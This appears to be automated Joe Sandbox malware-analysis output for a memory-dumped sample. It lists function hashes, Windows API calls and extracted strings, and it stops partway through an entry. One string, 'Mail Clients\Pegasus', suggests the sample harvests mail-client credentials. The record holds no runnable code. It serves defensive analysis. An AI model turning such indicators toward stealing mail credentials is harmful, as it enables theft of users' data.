                                                            • API String ID: 0-3754569955
                                                            • Opcode ID: 0e10baba5f1820c9e62b13837b958635acf04d9a09fea5eb7d3276a35e9ff41f
                                                            • Instruction ID: 2cd2b29504ceded7e566666e39bf41601f24f871e48b54542f9bd3e01645743e
                                                            • Opcode Fuzzy Hash: 0e10baba5f1820c9e62b13837b958635acf04d9a09fea5eb7d3276a35e9ff41f
                                                            • Instruction Fuzzy Hash: 9FF12E71D0051A8BCF288FACC89657EBA74AB55310F65492BF515FA3E0D3358E508BE3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ku^%$Ku^%$Mail Clients\Pegasus
                                                            • API String ID: 0-3776256347
                                                            • Opcode ID: 69303447eaede18a72e1c4aaef7c08798843526f7a0a7bd99bf296903903c389
                                                            • Instruction ID: 2258d42320e69a623f24c334c0513526cf511e92ac3881afa8683a971e72b5be
                                                            • Opcode Fuzzy Hash: 69303447eaede18a72e1c4aaef7c08798843526f7a0a7bd99bf296903903c389
                                                            • Instruction Fuzzy Hash: AEE1FBF1D002099BCF24DB9C8E86AFF7A749B45360F680527E455EA3A1E7B4CD408792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
                                                            • API String ID: 0-2784972518
                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction ID: 2640b7893dcb11257b904ede7ca3f51baee31ea1c0f4a4aae15e5da7a3a31afd
                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction Fuzzy Hash: 8F316CB6900609DFDF10CF99C880AAEBBF9FF88324F24404AD851A7351D775EA45CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                            • Instruction ID: 65a332ee093b169a033bae021c13e69f93a3f93c9a7f06ffce1282d0e7127543
                                                            • Opcode Fuzzy Hash: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                            • Instruction Fuzzy Hash: 78F15071E412199FDF14DFA9C880AAEB7B5FF88314F15826AD815AB381DB30AD01CF90
                                                            APIs
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 009CD885
                                                            • _CallDestructExceptionObject.LIBVCRUNTIME ref: 009CD907
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CallDestructExceptionObject___except_validate_context_record
                                                            • String ID:
                                                            • API String ID: 3557573858-0
                                                            • Opcode ID: c239e74d4f3c73cbfb2ec52de4c1c0d13c538d5be237da1c9bce762e36d27d04
                                                            • Instruction ID: 6112c5da07c7c7cad59dac1ebd157210329331dc37a5936d5c24c2f8f06edc4f
                                                            • Opcode Fuzzy Hash: c239e74d4f3c73cbfb2ec52de4c1c0d13c538d5be237da1c9bce762e36d27d04
                                                            • Instruction Fuzzy Hash: A121E472901205ABCB10EF68CC81EABBBA5BF85350F45C079E9199B245E730F925CBE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LK$Y[
                                                            • API String ID: 0-3215990068
                                                            • Opcode ID: e0129d6195a4faf04e5467944263a4367aaf707841d60a9d02f48df6a373b069
                                                            • Instruction ID: a46c599b19206f654b2e03ea724c93cc5ea85c8d0f80cb6b227398f74a382cac
                                                            • Opcode Fuzzy Hash: e0129d6195a4faf04e5467944263a4367aaf707841d60a9d02f48df6a373b069
                                                            • Instruction Fuzzy Hash: A4E1BAB19152058BDF24DFACD69536DBAF5AFC4314F25892AE089DB390D37C89808B93
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009ED31C,?,?,00000008,?,?,009ECEF7,00000000), ref: 009ED5EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                            • Instruction ID: e3a46aebf93396a0d9bb439da6b027f85e2161048d465dae82bec0b8fda2ead9
                                                            • Opcode Fuzzy Hash: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                            • Instruction Fuzzy Hash: 8EB15A31211648CFDB16CF29C48AB657BE0FF45364F298658E89ACF2A5C735ED92CB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: y_B>
                                                            • API String ID: 0-1404922283
                                                            • Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                            • Instruction ID: e9cebf484916f97db75b13114df91739db9fbbd916a6dfae1bfc568d2f2d08d8
                                                            • Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                            • Instruction Fuzzy Hash: 39123C7150C3018BCB249FA8D6D15AEFAE9AB98760F254E1EE0D6CB350DA34DC819B07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: a
                                                            • API String ID: 0-3904355907
                                                            • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                            • Instruction ID: 2a2ba050c0d2c9d767fa7bd73bb656d6df967802d8f016f6c42cf5fabfd9f1dd
                                                            • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                            • Instruction Fuzzy Hash: D5121FB0608741DFD764CF19C880B2BBBE6BBC9304F55892DF58987260D779E948CB92
                                                            APIs
                                                              • Part of subcall function 009E0597: RtlAllocateHeap.NTDLL(00000008,?,009C6A8C), ref: 009E05D8
                                                            • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009E22BE
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 009E2339
                                                            • FindClose.KERNEL32(00000000), ref: 009E235B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$AllocateCloseFirstHeapNext
                                                            • String ID:
                                                            • API String ID: 2963102669-0
                                                            • Opcode ID: 11130e8ba43ef9a754539bc983f7f1652457a0f25efbe84c150eaa5e199ad3f8
                                                            • Instruction ID: c50f80659eff98e16f808184543e07e40083acab008652a461e8a979a2704f75
                                                            • Opcode Fuzzy Hash: 11130e8ba43ef9a754539bc983f7f1652457a0f25efbe84c150eaa5e199ad3f8
                                                            • Instruction Fuzzy Hash: E0413B72604249AFDB19EFAACC85EBF736DEFC0354F144169F91597241EB30DE048A60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0
                                                            • API String ID: 0-4108050209
                                                            • Opcode ID: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                            • Instruction ID: f2a9c9f9eee4c895cb52f1dd4617210f61a98a5cb5195cf6d379b23327059c21
                                                            • Opcode Fuzzy Hash: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                            • Instruction Fuzzy Hash: E6C10072A80606AFCB28CFA8C49067EB7B9AF45314F18CA1FE446977A1C734ED45CB51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0
                                                            • API String ID: 0-4108050209
                                                            • Opcode ID: d368bac3811ff53457a2cb311bf3a0af827fa309b1fb3d430375599c5b749556
                                                            • Instruction ID: 38b515b7f72974ceae35ad14b5d1b5734979197e027db9f936f34616e0ae1bee
                                                            • Opcode Fuzzy Hash: d368bac3811ff53457a2cb311bf3a0af827fa309b1fb3d430375599c5b749556
                                                            • Instruction Fuzzy Hash: F8C1EE749807068FCB29CF68C69066EBBA9AF65300F64CA1BD4969B391C730EC46DB51
                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,00001000,00001000), ref: 009AFBEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryVirtual
                                                            • String ID:
                                                            • API String ID: 1804819252-0
                                                            • Opcode ID: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                            • Instruction ID: 2e3bc0f0337f1e2c3ced293ab5254feaf5b29681275de39b3a1d80ea9cf73156
                                                            • Opcode Fuzzy Hash: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                            • Instruction Fuzzy Hash: C5114E335002214BC720CF88DDD496A73BEFB8972876502A9DD455B601D276EC87C7F0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DestroyHeap
                                                            • String ID:
                                                            • API String ID: 2435110975-0
                                                            • Opcode ID: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                            • Instruction ID: b73e23e0e8b8b414f3f11a2c5ced8d15544015d4d3c8cf491935e350a570f089
                                                            • Opcode Fuzzy Hash: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                            • Instruction Fuzzy Hash: A2115EB1900B84CFD721CF699845B9AFBF4FB49710F04C62AE4A997740D3786805CFA1
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(0043CFB3,009CCB6A), ref: 009CD0F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                            • Instruction ID: 47f33e16290772828d48e2fc5bbc638760d2d50ec684603df376a2e6b4d14c41
                                                            • Opcode Fuzzy Hash: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                            • Instruction Fuzzy Hash:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: U
                                                            • API String ID: 0-3372436214
                                                            • Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                            • Instruction ID: 0d675ff7410f22f3d9e9afb32190a7906ceb0de6330b7329be1caaddc96b2322
                                                            • Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                            • Instruction Fuzzy Hash: E091957150C3419BCB649F18858563EBAE4ABC7750F254E2FE0CACB262D234C985DBDB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                            • Instruction ID: c753867edf48d3e5965b28b1b78801415d0ecbbbe617b7956048262f68b94357
                                                            • Opcode Fuzzy Hash: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                            • Instruction Fuzzy Hash: 03628D316087418FC715DF29C080A6AB7F1FF9A314F148A6DE4CA9B752DB35E946CB82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4bec0ca96d7979bb9874ea500f13f7931d97d16c0c4a5bc8c4a6a2c06eb0bd8
                                                            • Instruction ID: a5f65482a5a6bdc8cfac8a3ee8f358c074d36ec644d5204c04ebee266a5f92fc
                                                            • Opcode Fuzzy Hash: c4bec0ca96d7979bb9874ea500f13f7931d97d16c0c4a5bc8c4a6a2c06eb0bd8
                                                            • Instruction Fuzzy Hash: 6A122BF1D0011A9BDF18DBA88B435FE7AB5AB50330F684927E415FA2A0E735DA4487D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: caaf1d4bcde0c24294baec86a5e2eb3cea651728695487e10075cc7e93abdcfa
                                                            • Instruction ID: de4a7cefa638c849c32ff0c9146ec88b5f9f6bcad213a0827c357d666511faff
                                                            • Opcode Fuzzy Hash: caaf1d4bcde0c24294baec86a5e2eb3cea651728695487e10075cc7e93abdcfa
                                                            • Instruction Fuzzy Hash: 2E128AB050A7408FC324DF28C48166ABBE2FF96314F244E2DE5D787B91E735A845CB86
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
                                                            • Instruction ID: 08ceaeac2543c844c00f3496089758436cf2ad741f02bd7987780f04f7abf984
                                                            • Opcode Fuzzy Hash: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
                                                            • Instruction Fuzzy Hash: 2A125675A083069FC714CF2DC48066AFBE1FF89304F148A2EE89987351EB74E955CB82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7c5bfcb74d64b106436c267bea2b2e9854b0246cc83a94d6d7658a636303708
                                                            • Instruction ID: 2930fbb3d8d4adb26223a77b9c7a7de54d6f1df644bfc458c2f7299680daa731
                                                            • Opcode Fuzzy Hash: b7c5bfcb74d64b106436c267bea2b2e9854b0246cc83a94d6d7658a636303708
                                                            • Instruction Fuzzy Hash: AA02E6F1D00A0A8BDF258F9CDC816BFB775EB14310F26492AE515EA3A1E3748E458B53
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                            • Instruction ID: 7095b430b5555abe6e637f700f90b2afabf83e4d5c6bf371457c0f06f4928db5
                                                            • Opcode Fuzzy Hash: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                            • Instruction Fuzzy Hash: 0BF159B1E051098BDF28DF9CC8D25BEB6B9AB96310F24492BE115EB3D0E7B4C940C752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a42bc64a940a600b8496d0c65c55bde3d6951ff459c01317b1fbe73de1d0a5d
                                                            • Instruction ID: 97755ff60957ecb2ac3d78085dd4ccd93a648d5510d3599ec3271e3d359ceb40
                                                            • Opcode Fuzzy Hash: 9a42bc64a940a600b8496d0c65c55bde3d6951ff459c01317b1fbe73de1d0a5d
                                                            • Instruction Fuzzy Hash: 600231B0514B118FC378CF29C68052ABBF1BF46710B948A2DE6A78BB90D736F944CB54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 268e8702608a6b90ebe5f704738b9a629cec0ea57dbf574d3ec40b0b1ed608f4
                                                            • Instruction ID: 18014c872d66b5f23f85c75c72ed5d956f0da97c01c7052365c146de1c7e2e3f
                                                            • Opcode Fuzzy Hash: 268e8702608a6b90ebe5f704738b9a629cec0ea57dbf574d3ec40b0b1ed608f4
                                                            • Instruction Fuzzy Hash: B5E1F475D1110A8BCF24DFA8D889FBD7A74AB44314F24092FE51AEB3D1D3358A508B93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                            • Instruction ID: 0c42279d040cb4a1fa4a521dc36be854838027a6c60e11cb701c5d77307db757
                                                            • Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                            • Instruction Fuzzy Hash: B2E1EE75A083168FCB14CF18C4D066AB3E2FB9A714F59892DE9C58B391D639EC468B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 404008158dafff43aec7ad6a46d065142d89c1995864d67ae93c323eefc80fdb
                                                            • Instruction ID: 9b527a10df1b56064895c2681d965af113e425cc417d3f2fa05074580e3d5bf1
                                                            • Opcode Fuzzy Hash: 404008158dafff43aec7ad6a46d065142d89c1995864d67ae93c323eefc80fdb
                                                            • Instruction Fuzzy Hash: C981B0726083154FD308CF59C85235AFBD6ABC8310F4AC53EE9999B3A1E6B8DC058BC5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a8cd4802bb5dde251916ee4563a48a6af48aeae2953e1db2d908d410a145637
                                                            • Instruction ID: 1da37b23021959b7bbdf5661f1b1be8cdaa061499ec6c4fc630b2343f3eee6bd
                                                            • Opcode Fuzzy Hash: 4a8cd4802bb5dde251916ee4563a48a6af48aeae2953e1db2d908d410a145637
                                                            • Instruction Fuzzy Hash: 6D7115B2E001495ADF24459C8EB9AFE26AAA790330F3549B7E00DDB2B0E77DCD419752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 8976ad82445888a3523337de21bd725d268fd77f590c92d331c08a3a482d989a
                                                            • Instruction ID: 10493efa173c038ce5247128cd121f15ec77c574e68aa3e489b461203ee79423
                                                            • Opcode Fuzzy Hash: 8976ad82445888a3523337de21bd725d268fd77f590c92d331c08a3a482d989a
                                                            • Instruction Fuzzy Hash: CC71D471908395CBCB288F5987816ADBAE4ABC4720F254D2FE585DF352D238CC85EB47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54117711b5b6f3e3548b285e01c7f3ff021aa8cd1369d00f9261af8dca8f2be9
                                                            • Instruction ID: 8c5d2800daa3e9726acfba40f565d1bac66af8e64e3e2a4614fcf3c1b943bc03
                                                            • Opcode Fuzzy Hash: 54117711b5b6f3e3548b285e01c7f3ff021aa8cd1369d00f9261af8dca8f2be9
                                                            • Instruction Fuzzy Hash: 84512633B006164FC34CEA7C8D9216AF6D6ABC8250B46CA3ED44EDB391F970DA128681
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f960195895d4523939b019740813820171c81770d6ce1acbb507da4b7e7694f
                                                            • Instruction ID: 2fa5996fdc747a8211e39d3ade4e6934107c197fe4c4c2e18ea857b7b3353703
                                                            • Opcode Fuzzy Hash: 1f960195895d4523939b019740813820171c81770d6ce1acbb507da4b7e7694f
                                                            • Instruction Fuzzy Hash: 61518071E00259AFDF15DF99C981AAEBBB6EF88314F19C06DE805AB341C7349E51CB90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                            • Instruction ID: 1bf70ce55f15bac77ff7739cf76156b0277663944343cece16c418fb177cfd32
                                                            • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                            • Instruction Fuzzy Hash: 68515631E0821ACBCF658B5C8A806EDBBB8EB15731F654E27E615F7690C238DD84C752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 768c1d889d3b0b4dd139f02215e342ea367a32b8572c76f95433df72e755d40e
                                                            • Instruction ID: de9ed496828060945def11e817e7598d09d079133ac2fb2d8aa5c02de47949ab
                                                            • Opcode Fuzzy Hash: 768c1d889d3b0b4dd139f02215e342ea367a32b8572c76f95433df72e755d40e
                                                            • Instruction Fuzzy Hash: C551CE317080610FD39CE63D8967439BAE69BC9144B49CA7EE0DBCB692E875CA23C751
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1198482aff7cf87abae675dc4aebd9c7a23bf1f0da962c71c2e9c71d85cd782
                                                            • Instruction ID: 90afbff8b227f10852c6ba9500d52ce1beaefb32f95f49cf1945f7cb533c650d
                                                            • Opcode Fuzzy Hash: f1198482aff7cf87abae675dc4aebd9c7a23bf1f0da962c71c2e9c71d85cd782
                                                            • Instruction Fuzzy Hash: D841C0B25017049FD720DF15CE80BA6B7E8FF84724F1A8528ED8987766E734F890CA95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
